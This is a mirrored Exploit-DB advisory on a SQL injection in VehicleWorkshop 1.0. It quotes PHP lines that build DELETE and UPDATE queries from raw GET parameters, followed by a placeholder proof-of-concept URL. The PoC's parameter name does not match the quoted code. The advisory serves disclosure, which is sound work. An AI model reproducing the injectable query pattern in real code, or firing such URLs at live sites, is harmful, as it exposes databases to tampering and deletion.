VehicleWorkshop 1.0 – ‘bookingid’ SQL Injection

• Exploit Database
• 114 阅读

• 作者： Mehran Feizi
  日期： 2020-02-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48023/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  # Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection # Data: 2020-02-06 # Exploit Author: Mehran Feizi # Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop # Tested on: Windows # Google Dork: N/A     ========= Vulnerable Page: ========= /viewtestdrive.php     ========== Vulnerable Source: ========== Line6: if(isset($_GET['testid'])) Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'"); Line11: if(isset($_GET['testbid'])) Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'"); Line16: if(isset($_GET['testbida'])) Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'");   ========= POC: ========= http://site.com/viewtestdrive.php?bookingid=[SQL]